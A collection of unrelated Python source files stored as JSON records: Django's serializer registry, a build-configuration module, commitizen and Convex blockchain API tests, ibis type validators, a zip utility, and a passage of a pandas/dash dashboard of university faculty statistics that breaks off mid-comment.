{"ext": "py", "sha": "1a2eb4f6cc3c7505146763fafeed5e28062e1e07", "content": "\"\"\"\nInterfaces for serializing Django objects.\n\nUsage::\n\n from django.core import serializers\n json = serializers.serialize(\"json\", some_query_set)\n objects = list(serializers.deserialize(\"json\", json))\n\nTo add your own serializers, use the SERIALIZATION_MODULES setting::\n\n SERIALIZATION_MODULES = {\n \"csv\" : \"path.to.csv.serializer\",\n \"txt\" : \"path.to.txt.serializer\",\n }\n\n\"\"\"\n\nfrom django.conf import settings\nfrom django.utils import importlib\n\n# Built-in serializers\nBUILTIN_SERIALIZERS = {\n \"xml\" : \"django.core.serializers.xml_serializer\",\n \"python\" : \"django.core.serializers.python\",\n \"json\" : \"django.core.serializers.json\",\n}\n\n# Check for PyYaml and register the serializer if it's available.\ntry:\n import yaml\n BUILTIN_SERIALIZERS[\"yaml\"] = \"django.core.serializers.pyyaml\"\nexcept 
ImportError:\n pass\n\n_serializers = {}\n\ndef register_serializer(format, serializer_module, serializers=None):\n \"\"\"\"Register a new serializer. \n \n ``serializer_module`` should be the fully qualified module name\n for the serializer.\n \n If ``serializers`` is provided, the registration will be added\n to the provided dictionary.\n \n If ``serializers`` is not provided, the registration will be made\n directly into the global register of serializers. Adding serializers\n directly is not a thread-safe operation.\n \"\"\"\n module = importlib.import_module(serializer_module)\n if serializers is None:\n _serializers[format] = module\n else:\n serializers[format] = module\n \ndef unregister_serializer(format):\n \"Unregister a given serializer. This is not a thread-safe operation.\"\n del _serializers[format]\n\ndef get_serializer(format):\n if not _serializers:\n _load_serializers()\n return _serializers[format].Serializer\n\ndef get_serializer_formats():\n if not _serializers:\n _load_serializers()\n return _serializers.keys()\n\ndef get_public_serializer_formats():\n if not _serializers:\n _load_serializers()\n return [k for k, v in _serializers.iteritems() if not v.Serializer.internal_use_only]\n\ndef get_deserializer(format):\n if not _serializers:\n _load_serializers()\n return _serializers[format].Deserializer\n\ndef serialize(format, queryset, **options):\n \"\"\"\n Serialize a queryset (or any iterator that returns database objects) using\n a certain serializer.\n \"\"\"\n s = get_serializer(format)()\n s.serialize(queryset, **options)\n return s.getvalue()\n\ndef deserialize(format, stream_or_string):\n \"\"\"\n Deserialize a stream or a string. Returns an iterator that yields ``(obj,\n m2m_relation_dict)``, where ``obj`` is a instantiated -- but *unsaved* --\n object, and ``m2m_relation_dict`` is a dictionary of ``{m2m_field_name :\n list_of_related_objects}``.\n \"\"\"\n d = get_deserializer(format)\n return d(stream_or_string)\n\ndef _load_serializers():\n \"\"\"\n Register built-in and settings-defined serializers. This is done lazily so\n that user code has a chance to (e.g.) 
set up custom settings without\n needing to be careful of import order.\n \"\"\"\n global _serializers\n serializers = {}\n for format in BUILTIN_SERIALIZERS:\n register_serializer(format, BUILTIN_SERIALIZERS[format], serializers)\n if hasattr(settings, \"SERIALIZATION_MODULES\"):\n for format in settings.SERIALIZATION_MODULES:\n register_serializer(format, settings.SERIALIZATION_MODULES[format], serializers)\n _serializers = serializers\n"} {"ext": "py", "sha": "1a2eb501f42562afc6ecf94a3a3f06b412f2f738", "content": "__copyright__ = \"Copyright 2017, Georgia Institute of Technology\"\n__license__ = \"MIT\"\n__version_info__ = ('0', '0', '1')\n__version__ = '.'.join(__version_info__)\n__maintainer__ = \"Marat Dukhan\"\n__email__ = \"maratek@gmail.com\"\n\nimport logging\nlogger = logging.getLogger(\"confu\")\nlogger.setLevel(logging.INFO)\n\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.INFO)\n\n\nclass ConsoleFormatter(logging.Formatter):\n def __init__(self):\n super(ConsoleFormatter, self).__init__(\"%(message)s\")\n\n def format(self, record):\n message = super(ConsoleFormatter, self).format(record)\n if record.levelname in [\"DEBUG\", \"INFO\"]:\n return message[0].upper() + message[1:]\n else:\n return {\n \"WARNING\": \"Warning\", \"ERROR\": \"Error\", \"CRITICAL\": \"Fatal error\"\n }[record.levelname] + \": \" + message[0].lower() + message[1:]\n\nconsole_formatter = ConsoleFormatter()\nconsole_handler.setFormatter(console_formatter)\nlogger.addHandler(console_handler)\n\n\nfrom confu.builds import Build\nfrom confu.platform import Platform\n\n\ndef standard_parser(description=\"Confu configuration script\"):\n import argparse\n\n from os import linesep\n from confu.platform import host, possible_targets\n\n parser = argparse.ArgumentParser(description=description,\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"--target\", dest=\"target\", metavar=\"PLATFORM\", type=Platform,\n default=host.name,\n help=\"platform where the code will run. Potential options:\" + linesep +\n \" \" + host.name + \" (default)\" + linesep +\n linesep.join(\" \" + target for target in possible_targets[1:]))\n parser.add_argument(\"--toolchain\", dest=\"toolchain\", metavar=\"TOOLCHAIN\",\n choices=[\"auto\", \"gnu\", \"clang\"], default=\"auto\",\n help=\"toolchain to use for compilation. 
Potential options:\" + linesep +\n linesep.join(\" \" + name for name in [\"auto (default)\", \"gnu\", \"clang\"]))\n\n \n\n return parser\n"} {"ext": "py", "sha": "1a2eb7178da2387741821181e4ea26b67dd1ed12", "content": "import pytest\n\nfrom commitizen import BaseCommitizen, defaults, factory\nfrom commitizen.config import BaseConfig\nfrom commitizen.exceptions import NoCommitizenFoundException\n\n\ndef test_factory():\n config = BaseConfig()\n config.settings.update({\"name\": defaults.name})\n r = factory.commiter_factory(config)\n assert isinstance(r, BaseCommitizen)\n\n\ndef test_factory_fails():\n config = BaseConfig()\n config.settings.update({\"name\": \"Nothing\"})\n with pytest.raises(NoCommitizenFoundException) as excinfo:\n factory.commiter_factory(config)\n\n assert \"The committer has not been found in the system.\" in str(excinfo)\n"} {"ext": "py", "sha": "1a2eb90337162598e808c77019efb7954485e0d3", "content": "import datetime\nimport zipfile\nfrom os import chdir, getpid, getcwd, listdir, walk, path\n\n\ndef listdir_cwd():\n \"\"\"\n Lazy listdir for cwd.\n :return:\n \"\"\"\n return listdir(getcwd())\n\n\ndef f(x, fn):\n \"\"\"\n Le Zip\n :param x:\n :param fn:\n :return:\n \"\"\"\n with zipfile.ZipFile.open(fn, 'a', zipfile.ZIP_LZMA, True) as file:\n file.write(x)\n file.close()\n print(f'{getpid()}: {x}')\n return x\n\n\ndef utc_now_to_file_str():\n \"\"\"\n Format UTC now to _YYYYmmdd_HHMMSS\n :return:\n \"\"\"\n return datetime.datetime.strftime(datetime.datetime.utcnow(), '_%Y%m%d_%H%M%S')\n\n\ndef create_filename(prefix, extension):\n \"\"\"\n Create filename to be used.\n :param prefix:\n :param extension:\n :return:\n \"\"\"\n return f'{prefix}{utc_now_to_file_str()}.{extension}'\n\n\ndef log_folders_destination_targets(dest, targets, filename):\n \"\"\"\n Log Folders, destination, and targets.\n :param dest:\n :param targets:\n :param filename:\n :return:\n \"\"\"\n print(f'\\n Destination Folder: {dest}'\n f'\\n Targets: {str(len(targets))}'\n f'\\n File: {filename}')\n\n\ndef get_all_file_locs(targets):\n \"\"\"\n Gets all file locations.\n :return:\n \"\"\"\n file_list = []\n for target in targets:\n chdir(target)\n for root, dirs, files in walk(target):\n for file in files:\n file_list.append(path.join(root, file))\n return file_list\n"} {"ext": "py", "sha": "1a2eb91dd532d9114ec4f0292e619b09f489bbb7", "content": "import collections\nimport enum\n\nfrom itertools import starmap, product\n\nimport six\n\nfrom ibis.compat import suppress\nimport ibis.util as util\nimport ibis.common as com\nimport ibis.expr.types as ir\nimport ibis.expr.schema as sch\nimport ibis.expr.datatypes as dt\n\ntry:\n from cytoolz import curry, compose, identity\nexcept ImportError:\n from toolz import curry, compose, identity\n\n\ndef highest_precedence_dtype(exprs):\n \"\"\"Return the highest precedence type from the passed expressions\n\n Also verifies that there are valid implicit casts between any of the types\n and the selected highest precedence type.\n This is a thin wrapper around datatypes highest precedence check.\n\n Parameters\n ----------\n exprs : Iterable[ir.ValueExpr]\n A sequence of Expressions\n\n Returns\n -------\n dtype: DataType\n The highest precedence datatype\n \"\"\"\n if not exprs:\n raise ValueError('Must pass at least one expression')\n\n return dt.highest_precedence(expr.type() for expr in exprs)\n\n\ndef castable(source, target):\n \"\"\"Return whether source ir type is implicitly castable to target\n\n Based on the underlying datatypes and the value in case 
of Literals\n \"\"\"\n op = source.op()\n value = getattr(op, 'value', None)\n return dt.castable(source.type(), target.type(), value=value)\n\n\ndef comparable(left, right):\n return castable(left, right) or castable(right, left)\n\n\ndef cast(source, target):\n \"\"\"Currently Literal to *Scalar implicit casts are allowed\"\"\"\n import ibis.expr.operations as ops # TODO: don't use ops here\n\n if not castable(source, target):\n raise com.IbisTypeError('Source is not castable to target type!')\n\n # currently it prevents column -> scalar implicit castings\n # however the datatypes are matching\n op = source.op()\n if not isinstance(op, ops.Literal):\n raise com.IbisTypeError('Only able to implicitly cast literals!')\n\n out_type = target.type().scalar_type()\n return out_type(op)\n\n\n# ---------------------------------------------------------------------\n# Input type validators / coercion functions\n\n\nclass validator(curry):\n\n def __repr__(self):\n return '{}({}{})'.format(\n self.func.__name__,\n repr(self.args)[1:-1],\n ', '.join('{}={!r}'.format(k, v) for k, v in self.keywords.items())\n )\n\n\nnoop = validator(identity)\n\n\n@validator\ndef one_of(inners, arg):\n \"\"\"At least one of the inner validators must pass\"\"\"\n for inner in inners:\n with suppress(com.IbisTypeError, ValueError):\n return inner(arg)\n\n rules_formatted = ', '.join(map(repr, inners))\n raise com.IbisTypeError(\n 'Arg passes neither of the following rules: {}'.format(rules_formatted)\n )\n\n\n@validator\ndef all_of(inners, arg):\n \"\"\"All of the inner valudators must pass.\n\n The order of inner validators matters.\n\n Parameters\n ----------\n inners : List[validator]\n Functions are applied from right to left so allof([rule1, rule2], arg) is\n the same as rule1(rule2(arg)).\n arg : Any\n Value to be validated.\n\n Returns\n -------\n arg : Any\n Value maybe coerced by inner validators to the appropiate types\n \"\"\"\n return compose(*inners)(arg)\n\n\n@validator\ndef isin(values, arg):\n if arg not in values:\n raise ValueError(\n 'Value with type {} is not in {!r}'.format(type(arg), values)\n )\n if isinstance(values, dict): # TODO check for mapping instead\n return values[arg]\n else:\n return arg\n\n\n@validator\ndef member_of(obj, arg):\n if isinstance(arg, enum.Enum):\n enum.unique(obj) # check that enum has unique values\n arg = arg.name\n\n if not hasattr(obj, arg):\n raise com.IbisTypeError(\n 'Value with type {} is not a member of {}'.format(type(arg), obj)\n )\n return getattr(obj, arg)\n\n\n@validator\ndef list_of(inner, arg, min_length=0):\n if isinstance(arg, six.string_types) or not isinstance(\n arg, (collections.Sequence, ir.ListExpr)\n ):\n raise com.IbisTypeError('Argument must be a sequence')\n\n if len(arg) < min_length:\n raise com.IbisTypeError(\n 'Arg must have at least {} number of elements'.format(min_length)\n )\n return ir.sequence(list(map(inner, arg)))\n\n\n@validator\ndef datatype(arg):\n return dt.dtype(arg)\n\n\n@validator\ndef instance_of(klass, arg):\n \"\"\"Require that a value has a particular Python type.\"\"\"\n if not isinstance(arg, klass):\n raise com.IbisTypeError(\n 'Given argument with type {} is not an instance of {}'.format(\n type(arg), klass\n )\n )\n return arg\n\n\n@validator\ndef value(dtype, arg):\n \"\"\"Validates that the given argument is a Value with a particular datatype\n\n Parameters\n ----------\n dtype : DataType subclass or DataType instance\n arg : python literal or an ibis expression\n If a python literal is given the validator tries 
to coerce it to an ibis\n literal.\n\n Returns\n -------\n arg : AnyValue\n An ibis value expression with the specified datatype\n \"\"\"\n if not isinstance(arg, ir.Expr):\n # coerce python literal to ibis literal\n arg = ir.literal(arg)\n\n if not isinstance(arg, ir.AnyValue):\n raise com.IbisTypeError('Given argument with type {} is not a value '\n 'expression'.format(type(arg)))\n\n # retrieve literal values for implicit cast check\n value = getattr(arg.op(), 'value', None)\n\n if isinstance(dtype, type) and isinstance(arg.type(), dtype):\n # dtype class has been specified like dt.Interval or dt.Decimal\n return arg\n elif dt.castable(arg.type(), dt.dtype(dtype), value=value):\n # dtype instance or string has been specified and arg's dtype is\n # implicitly castable to it, like dt.int8 is castable to dt.int64\n return arg\n else:\n raise com.IbisTypeError('Given argument with datatype {} is not '\n 'subtype of {} nor implicitly castable to '\n 'it'.format(arg.type(), dtype))\n\n\n@validator\ndef scalar(inner, arg):\n return instance_of(ir.ScalarExpr, inner(arg))\n\n\n@validator\ndef column(inner, arg):\n return instance_of(ir.ColumnExpr, inner(arg))\n\n\n@validator\ndef array_of(inner, arg):\n val = arg if isinstance(arg, ir.Expr) else ir.literal(arg)\n argtype = val.type()\n if not isinstance(argtype, dt.Array):\n raise com.IbisTypeError(\n 'Argument must be an array, got expression {} which is of type '\n '{}'.format(val, val.type()))\n return value(dt.Array(inner(val[0]).type()), val)\n\n\nany = value(dt.any)\ndouble = value(dt.double)\nstring = value(dt.string)\nboolean = value(dt.boolean)\ninteger = value(dt.int64)\ndecimal = value(dt.Decimal)\nfloating = value(dt.float64)\ndate = value(dt.date)\ntime = value(dt.time)\ntimestamp = value(dt.Timestamp)\ncategory = value(dt.category)\ntemporal = one_of([timestamp, date, time])\n\nstrict_numeric = one_of([integer, floating, decimal])\nsoft_numeric = one_of([integer, floating, decimal, boolean])\nnumeric = soft_numeric\n\nset_ = value(dt.Set)\narray = value(dt.Array)\nstruct = value(dt.Struct)\nmapping = value(dt.Map(dt.any, dt.any))\n\n\n@validator\ndef interval(arg, units=None):\n arg = value(dt.Interval, arg)\n unit = arg.type().unit\n if units is not None and unit not in units:\n msg = 'Interval unit `{}` is not among the allowed ones {}'\n raise com.IbisTypeError(msg.format(unit, units))\n return arg\n\n\n@validator\ndef client(arg):\n from ibis.client import Client\n return instance_of(Client, arg)\n\n\n# ---------------------------------------------------------------------\n# Ouput type promoter functions\n\n\ndef promoter(fn):\n def wrapper(name_or_value, *args, **kwargs):\n if isinstance(name_or_value, str):\n return lambda self: fn(getattr(self, name_or_value),\n *args, **kwargs)\n else:\n return fn(name_or_value, *args, **kwargs)\n return wrapper\n\n\n@promoter\ndef shape_like(arg, dtype=None):\n if isinstance(arg, (tuple, list, ir.ListExpr)):\n datatype = dtype or highest_precedence_dtype(arg)\n columnar = util.any_of(arg, ir.AnyColumn)\n else:\n datatype = dtype or arg.type()\n columnar = isinstance(arg, ir.AnyColumn)\n\n dtype = dt.dtype(datatype)\n\n if columnar:\n return dtype.array_type()\n else:\n return dtype.scalar_type()\n\n\n@promoter\ndef scalar_like(arg):\n output_dtype = arg.type()\n return output_dtype.scalar_type()\n\n\n@promoter\ndef array_like(arg):\n output_dtype = arg.type()\n return output_dtype.array_type()\n\n\ncolumn_like = array_like\n\n\n@promoter\ndef typeof(arg):\n return 
arg._factory\n\n\n@validator\ndef table(schema, arg):\n \"\"\"A table argument.\n\n Parameters\n ----------\n schema : Union[sch.Schema, List[Tuple[str, dt.DataType]]\n A validator for the table's columns. Only column subset validators are\n currently supported. Accepts any arguments that `sch.schema` accepts.\n See the example for usage.\n arg : The validatable argument.\n\n Examples\n --------\n The following op will accept an argument named ``'table'``. Note that the\n ``schema`` argument specifies rules for columns that are required to be in\n the table: ``time``, ``group`` and ``value1``. These must match the types\n specified in the column rules. Column ``value2`` is optional, but if\n present it must be of the specified type. The table may have extra columns\n not specified in the schema.\n \"\"\"\n assert isinstance(arg, ir.TableExpr)\n\n if arg.schema() >= sch.schema(schema):\n return arg\n\n raise com.IbisTypeError(\n 'Argument is not a table with column subset of {}'.format(schema)\n )\n\n\n# TODO: might just use bounds instead of actual literal values\n# that could simplify interval binop output_type methods\ndef _promote_numeric_binop(exprs, op):\n bounds, dtypes = [], []\n for arg in exprs:\n dtypes.append(arg.type())\n if hasattr(arg.op(), 'value'):\n # arg.op() is a literal\n bounds.append([arg.op().value])\n else:\n bounds.append(arg.type().bounds)\n\n # In some cases, the bounding type might be int8, even though neither\n # of the types are that small. We want to ensure the containing type is\n # _at least_ as large as the smallest type in the expression.\n values = starmap(op, product(*bounds))\n dtypes += [dt.infer(value, allow_overflow=True) for value in values]\n\n return dt.highest_precedence(dtypes)\n\n\n@promoter\ndef numeric_like(args, op):\n if util.all_of(args, ir.IntegerValue):\n dtype = _promote_numeric_binop(args, op)\n return shape_like(args, dtype=dtype)\n else:\n return shape_like(args)\n\n\n# TODO: create varargs marker for impala udfs\n"} {"ext": "py", "sha": "1a2eb9326f0aab349c6869d901d2e8f44591ddbc", "content": "\"\"\"\n\n\n Test Convex Breaking\n\n\"\"\"\n\nimport pytest\nimport secrets\n\nfrom convex_api.account import Account\nfrom convex_api.api import API\nfrom convex_api.exceptions import ConvexAPIError\nfrom convex_api.utils import (\n add_0x_prefix,\n to_address\n)\n\n\ndef test_convex_recursion(convex, test_account):\n chain_length = 4\n address_list = []\n for index in range(0, chain_length):\n contract = f\"\"\"\n(def chain-{index}\n (deploy\n '(do\n (def stored-data\n ^{{:private? true}}\n nil\n )\n (def chain-address\n ^{{:private? true}}\n nil\n )\n (defn get\n ^{{:callable? true}}\n []\n (call chain-address (get))\n )\n (defn set\n ^{{:callable? true}}\n [x]\n ( if chain-address (call chain-address(set x)) (def stored-data x))\n )\n (defn set-chain-address\n ^{{:callable? 
true}}\n [x]\n (def chain-address x)\n )\n )\n )\n)\n\"\"\"\n convex.topup_account(test_account)\n result = convex.send(contract, test_account)\n address_list.append(to_address(result['value']))\n for index in range(0, chain_length):\n next_index = index + 1\n if next_index == chain_length:\n next_index = 0\n call_address = address_list[next_index]\n result = convex.send(f'(call chain-{index} (set-chain-address #{call_address}))', test_account)\n test_number = secrets.randbelow(1000)\n if index == chain_length - 1:\n with pytest.raises(ConvexAPIError, match='DEPTH'):\n result = convex.send(f'(call chain-{index} (set {test_number}))', test_account)\n else:\n result = convex.send(f'(call chain-0 (set {test_number}))', test_account)\n assert(result)\n assert(result['value'] == test_number)\n with pytest.raises(ConvexAPIError, match='DEPTH'):\n convex.query('(call chain-0 (get))', test_account)\n\ndef test_schedule_transfer(convex, test_account, other_account):\n # you can send coins to an actor , if it exports the receive-coin function\n\n contract = \"\"\"\n(def transfer-for-ever\n (deploy\n '(do\n (defn tx-delay\n ^{:callable? true}\n [to-address amount]\n (transfer to-address amount)\n (def call-address *address*)\n (schedule (+ *timestamp* 1000) (call call-address (tx-delay to-address amount)))\n )\n (defn tx-now\n ^{:callable? true}\n [to-address amount]\n (transfer to-address amount)\n )\n (defn show-schedule\n ^{:callable? true}\n []\n [(get *state* :schedule) *address*]\n )\n (defn receive-coin\n ^{:callable? true}\n [sender amount data]\n (accept amount)\n )\n )\n )\n)\n\"\"\"\n# (call contract-address (tx-to to-address amount))\n\n convex.topup_account(test_account)\n convex.topup_account(other_account, 8000000)\n result = convex.send(contract, test_account)\n contract_address = to_address(result['value'])\n convex.transfer(contract_address, 800000, other_account)\n convex.topup_account(test_account)\n result = convex.send(f'(call #{contract_address} (tx-delay #{other_account.address} 1000))', test_account)\n print(result)\n result = convex.send(f'(call #{contract_address} (show-schedule))', test_account)\n print(result)\n"} {"ext": "py", "sha": "1a2eb97675cb4a0da568b8029692ffa97378cbb7", "content": "# Autores:\n# Darlan de Castro Silva Filho\n# Marcos Henrique Fernandes Marcone\n\n\nfrom pandas import Series, DataFrame\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.graph_objs as go\nimport plotly.express as px\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\n\n# Funções de estilização e opções das bibliotecas utilizadas\nplt.style.use('classic')\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\n# Função para o path das bases de dados\n# Entrada: nome = string\n# Saida: path = string\n\n\ndef path(nome):\n return './'+nome+'.csv'\n\n\n# Importa os arquivos (bases de dados) utilizados\nunidades = pd.read_csv(path('unidades'), sep=';')\ndocentes = pd.read_csv(path('docentes'), sep=';')\navaliacao = pd.read_csv(path('avaliacaoDocencia'), sep=';')\n\n# Filtra os docentes que trabalham em Natal e que tenham a categoria de Professor do Magistério Superior\nunidadesFiltradas = unidades.loc[:, [\n 'id_unidade', 'municipio', 'unidade_responsavel']]\ndocentesComUnidadeAcademica = pd.merge(\n docentes, unidadesFiltradas, left_on=\"id_unidade_lotacao\", right_on=\"id_unidade\").drop('id_unidade', axis=1)\ndocentesNatalUnidadeAcademica = 
docentesComUnidadeAcademica[\n docentesComUnidadeAcademica['municipio'] == 'NATAL']\ndocentesNatalMSUnidadeAcademica = docentesNatalUnidadeAcademica[\n docentesNatalUnidadeAcademica['categoria'] == 'PROFESSOR DO MAGISTERIO SUPERIOR']\n\n# Filtra as unidades_dirigentes não aceitas pela aplicação\ndocentesNatalMSUnidadeAcademica['unidade_dirigente'] = np.where(docentesNatalMSUnidadeAcademica['unidade_responsavel'] == 'UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE', (\n docentesNatalMSUnidadeAcademica['lotacao']), (docentesNatalMSUnidadeAcademica['unidade_responsavel']))\nunidadesNaoAceitas = ['PRÓ-REITORIA DE EXTENSÃO UNIVERSITÁRIA', 'MUSEU CÂMARA CASCUDO', 'UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE', 'EDITORA UNIVERSITÁRIA', 'EMPRESA BRASILEIRA DE SERVICOS HOSPITALARES',\n 'REITORIA', 'INSTITUTO DE MEDICINA TROPICAL - IMT-RN', 'SECRETARIA DE EDUCAÇÃO A DISTÂNCIA', 'GABINETE DO REITOR', 'SUPERINTENDENCIA DE COMUNICACAO', 'PRÓ-REITORIA DE ADMINISTRAÇÃO (PROAD)']\ndocentesNatalMSUnidadeAcademica = docentesNatalMSUnidadeAcademica[~docentesNatalMSUnidadeAcademica['unidade_dirigente'].isin(\n unidadesNaoAceitas)]\n\n# Gráfico de barras da distribuição dos docentes da UFRN por unidade acadêmica\nquantidadeDocentesUnidadeDirigente = docentesNatalMSUnidadeAcademica['unidade_dirigente'].value_counts(\n)\nbarraDocentesUnidadeDirigente = go.Bar(x=quantidadeDocentesUnidadeDirigente.index,\n y=quantidadeDocentesUnidadeDirigente.values, text=quantidadeDocentesUnidadeDirigente.values, textposition='auto')\nlayoutDocentesUnidadeDirigente = go.Layout(title='Gráfico de docentes por unidade responsável (UFRN 2021 - Unidades de Natal - Magistério Superior)', xaxis={\n 'title': 'Unidade responsável'}, yaxis={'title': 'Número de docentes'})\nfiguraDocentesUnidadeDirigente = go.Figure(\n data=[barraDocentesUnidadeDirigente], layout=layoutDocentesUnidadeDirigente)\n\n# Gráfico de pizza da distribuição dos docentes da UFRN por sexo\nquantidadeDocentesSexo = docentesNatalMSUnidadeAcademica['sexo'].value_counts()\npiechartSexo = go.Pie(labels=['Masculino', 'Feminino'], values=quantidadeDocentesSexo.values, text=quantidadeDocentesSexo.values, marker={\n 'colors': ['#665FD1', '#FFFF7E'], 'line': dict(color='#000000', width=2)})\nlayoutDocentesSexo = go.Layout(title='Gráfico de docentes por sexo (UFRN 2021 - Unidades de Natal - Magistério Superior)',\n xaxis={'title': 'Docentes'}, yaxis={'title': 'Número de docentes'}, barmode='stack')\nfiguraDocentesSexo = go.Figure(data=piechartSexo, layout=layoutDocentesSexo)\n\n# Gráfico de pizza da distribuição dos docentes da UFRN por formação acadêmica\nquantidadeDocentesFormacao = docentesNatalMSUnidadeAcademica['formacao'].value_counts(\n)\npiechartFormacao = go.Pie(labels=quantidadeDocentesFormacao.index, values=quantidadeDocentesFormacao.values, text=quantidadeDocentesFormacao.values, marker={\n 'colors': ['#665FD1', '#FFFF7E', '#F5054F', '#3F012C'], 'line': dict(color='#000000', width=2)})\nlayoutDocentesFormacao = go.Layout(title='Gráfico de docentes por formação (UFRN 2021 - Unidades de Natal - Magistério Superior)',\n xaxis={'title': 'Formação'}, yaxis={'title': 'Número de docentes'})\nfiguraDocentesFormacao = go.Figure(\n data=[piechartFormacao], layout=layoutDocentesFormacao)\n\n# Gráfico de pizza da distribuição dos docentes da UFRN por classe funcional\nquantidadeDocentesClasseFuncional = docentesNatalMSUnidadeAcademica['classe_funcional'].value_counts(\n).sort_index()\npiechartClasseFuncional = go.Pie(labels=quantidadeDocentesClasseFuncional.index, 
values=quantidadeDocentesClasseFuncional.values,\n text=quantidadeDocentesClasseFuncional.values, marker={'colors': px.colors.qualitative.Dark24, 'line': dict(color='#000000', width=2)})\nbarraDocentesClasseFuncional = go.Bar(x=quantidadeDocentesClasseFuncional.index, y=quantidadeDocentesClasseFuncional.values,\n text=quantidadeDocentesClasseFuncional.values, textposition='auto', marker={'color': '#5D21D0'})\nlayoutDocentesClasseFuncional = go.Layout(title='Gráfico de docentes por classe funcional (UFRN 2021 - Unidades de Natal - Magistério Superior)', xaxis={\n 'title': 'Classe funcional'}, yaxis={'title': 'Número de docentes'}, height=450)\nfiguraDocentesClasseFuncional = go.Figure(\n data=[piechartClasseFuncional], layout=layoutDocentesClasseFuncional)\n\n# Cria gráfico para ressaltar os dados de classe funcional dos docentes agrupados por unidade_dirigente\nfiltroClasseFuncional = ['unidade_dirigente', 'classe_funcional']\ndocentesClasseGroupBy = docentesNatalMSUnidadeAcademica.groupby(\n filtroClasseFuncional).count().reset_index().loc[:, filtroClasseFuncional + ['nome']]\ndocentesClasseGroupBy['quantidade'] = docentesClasseGroupBy['nome']\ndel docentesClasseGroupBy['nome']\nfigClasseDetalhe = px.bar(docentesClasseGroupBy, x=\"unidade_dirigente\", y=\"quantidade\", color=\"classe_funcional\",\n text='quantidade', color_discrete_sequence=px.colors.qualitative.Bold, height=800)\n\n# Cria gráfico para ressaltar os dados de sexo dos docentes agrupados por unidade_dirigente\nfiltroSexo = ['unidade_dirigente', 'sexo']\ndocentesSexoGroupBy = docentesNatalMSUnidadeAcademica.groupby(\n filtroSexo).count().reset_index().loc[:, filtroSexo + ['nome']]\ndocentesSexoGroupBy['quantidade'] = docentesSexoGroupBy['nome']\ndel docentesSexoGroupBy['nome']\nfigSexoDetalhe = px.bar(docentesSexoGroupBy, x=\"unidade_dirigente\", y=\"quantidade\",\n color=\"sexo\", text='quantidade', color_discrete_sequence=px.colors.qualitative.Bold)\n\n# Cria gráfico para ressaltar os dados de formação acadêmica dos docentes agrupados por unidade_dirigente\nfiltroFormacao = ['unidade_dirigente', 'formacao']\ndocentesFormacaoGroupBy = docentesNatalMSUnidadeAcademica.groupby(\n filtroFormacao).count().reset_index().loc[:, filtroFormacao + ['nome']]\ndocentesFormacaoGroupBy['quantidade'] = docentesFormacaoGroupBy['nome']\ndel docentesFormacaoGroupBy['nome']\nfigFormacaoDetalhe = px.bar(docentesFormacaoGroupBy, x=\"unidade_dirigente\",\n y=\"quantidade\", color=\"formacao\", text='quantidade', range_y=[0, 400])\n\n# Cria um dicionário com os dados indexados por unidade_dirigente\nunidadesDirigentes = docentesNatalMSUnidadeAcademica['unidade_dirigente'].unique(\n)\nunidadesDirigentes\ndfUnidadesDirigentes = {}\nfor unidadeDirigente in unidadesDirigentes:\n df = docentesNatalMSUnidadeAcademica[docentesNatalMSUnidadeAcademica['unidade_dirigente'] == unidadeDirigente]\n dfUnidadesDirigentes[unidadeDirigente] = df\n\n# Função utilizada na filtragem de um dataFrame agrupando os dados por uma propriedade e o filtrando por outras duas\n# Entradas: df = DataFrame, title = string, x = string, y = string, cor = ['rgb(a,b,c)','rgb(d,e,f)'...]\n# Saídas: figAdmissao = Gráfico de barras\n\n\ndef filtrarDFPorUnidadeDirigente(df, title, x, y, cor=px.colors.qualitative.Bold):\n dfFinal = df[title]\n filtro = [x, y]\n docentesFiltroGroupBy = dfFinal.groupby(\n filtro).count().reset_index().loc[:, filtro + ['nome']]\n docentesFiltroGroupBy['quantidade'] = docentesFiltroGroupBy['nome']\n del docentesFiltroGroupBy['nome']\n figAdmissao = 
px.bar(docentesFiltroGroupBy, x=x, y=\"quantidade\", color=y,\n text='quantidade', color_discrete_sequence=cor, title=title)\n return figAdmissao\n\n\n# Cria e formata um dataFrame geral com todos os professores e os atributos necessários para a geração dos gráficos e da tabela por média\navaliacaoDocentesFiltro = avaliacao[avaliacao['nome_docente'].isin(\n docentesNatalMSUnidadeAcademica['nome'])]\navaliacaoDocentesFiltro['total_postura'] = avaliacaoDocentesFiltro['postura_profissional_media'] * \\\n avaliacaoDocentesFiltro['qtd_discentes']\navaliacaoDocentesFiltro['total_atuacao'] = avaliacaoDocentesFiltro['atuacao_profissional_media'] * \\\n avaliacaoDocentesFiltro['qtd_discentes']\ndocentesMedias = avaliacaoDocentesFiltro.loc[:, [\n 'nome_docente', 'qtd_discentes', 'total_postura', 'total_atuacao']]\ndocentesMediasGroupBy = docentesMedias.groupby(['nome_docente']).sum()\ndocentesMediasGroupBy['media_postura'] = docentesMediasGroupBy['total_postura'] / \\\n docentesMediasGroupBy['qtd_discentes']\ndocentesMediasGroupBy['media_atuacao'] = docentesMediasGroupBy['total_atuacao'] / \\\n docentesMediasGroupBy['qtd_discentes']\ndocentesMediasGroupBy['media_alunos'] = avaliacaoDocentesFiltro.groupby(\n ['nome_docente']).mean().loc[:, 'autoavaliacao_aluno_media']\ndocentesMediasNatalMSUnidadeAcademica = pd.merge(\n docentesNatalMSUnidadeAcademica, docentesMediasGroupBy, left_on=\"nome\", right_on=\"nome_docente\").round(3)\n\n# Exclui os campos não necessários para a geração da tabela de notas e assinala os campos restantes para um novo dataFrame\ndocenteParaTabelaNotas = docentesMediasNatalMSUnidadeAcademica.loc[:, [\n 'nome', 'media_postura', 'media_atuacao', 'media_alunos', 'unidade_dirigente', 'lotacao', 'qtd_discentes']]\n\n# Faz a filtragem e formatação de um dataFrame para agrupas os dados da media_postura, media_atuacao e media_alunos por undade_dirigente\ndocentesMediaUnidadeDirigente = docentesMediasNatalMSUnidadeAcademica.groupby(\n 'unidade_dirigente').mean().loc[:, ['media_postura', 'media_atuacao', 'media_alunos']]\ndocentesMediaUnidadeDirigente['unidade_dirigente'] = docentesMediaUnidadeDirigente.index\n\n# Faz a filtragem e formatação de um dataFrame para conter as informações da media_postura, media_atuacao e media_alunos a serem apresentas no gráfico de 